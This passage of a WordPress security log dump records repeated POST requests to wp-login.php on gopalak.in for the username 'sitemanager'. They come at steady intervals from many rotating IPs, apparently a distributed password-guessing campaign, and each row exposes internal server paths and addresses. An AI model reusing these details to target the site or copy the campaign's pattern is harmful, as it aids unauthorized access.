Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57678\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745559559.280493;s:12:\"REQUEST_TIME\";i:1745559559;}}','173.212.207.177',0,'2025-04-25 11:09:21','1970-01-01 00:00:00'),(94265,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41468\";s:11:\"REMOTE_ADDR\";s:12:\"5.10.248.130\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745559976.1744831;s:12:\"REQUEST_TIME\";i:1745559976;}}','5.10.248.130',0,'2025-04-25 11:16:18','1970-01-01 00:00:00'),(94266,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55868\";s:11:\"REMOTE_ADDR\";s:14:\"194.195.113.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745560396.861716;s:12:\"REQUEST_TIME\";i:1745560396;}}','194.195.113.17',0,'2025-04-25 11:23:18','1970-01-01 00:00:00'),(94267,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43906\";s:11:\"REMOTE_ADDR\";s:13:\"51.77.247.142\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745560815.1885891;s:12:\"REQUEST_TIME\";i:1745560815;}}','51.77.247.142',0,'2025-04-25 11:30:17','1970-01-01 00:00:00'),(94268,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60784\";s:11:\"REMOTE_ADDR\";s:12:\"149.18.51.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745561239.7166719;s:12:\"REQUEST_TIME\";i:1745561239;}}','149.18.51.67',0,'2025-04-25 11:37:27','1970-01-01 00:00:00'),(94269,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53724\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745561661.780324;s:12:\"REQUEST_TIME\";i:1745561661;}}','199.188.201.172',0,'2025-04-25 11:44:23','1970-01-01 00:00:00'),(94270,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43310\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745562089.05847;s:12:\"REQUEST_TIME\";i:1745562089;}}','198.54.120.17',0,'2025-04-25 11:51:30','1970-01-01 00:00:00'),(94271,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47216\";s:11:\"REMOTE_ADDR\";s:14:\"20.198.224.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745562511.0361941;s:12:\"REQUEST_TIME\";i:1745562511;}}','20.198.224.111',0,'2025-04-25 11:58:32','1970-01-01 00:00:00'),(94272,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53846\";s:11:\"REMOTE_ADDR\";s:13:\"104.249.63.34\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745562937.897567;s:12:\"REQUEST_TIME\";i:1745562937;}}','104.249.63.34',0,'2025-04-25 12:05:39','1970-01-01 00:00:00'),(94273,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36394\";s:11:\"REMOTE_ADDR\";s:13:\"162.19.67.137\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745563356.5819211;s:12:\"REQUEST_TIME\";i:1745563356;}}','162.19.67.137',0,'2025-04-25 12:12:38','1970-01-01 00:00:00'),(94274,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36154\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745563785.8367929;s:12:\"REQUEST_TIME\";i:1745563785;}}','66.102.132.19',0,'2025-04-25 12:19:47','1970-01-01 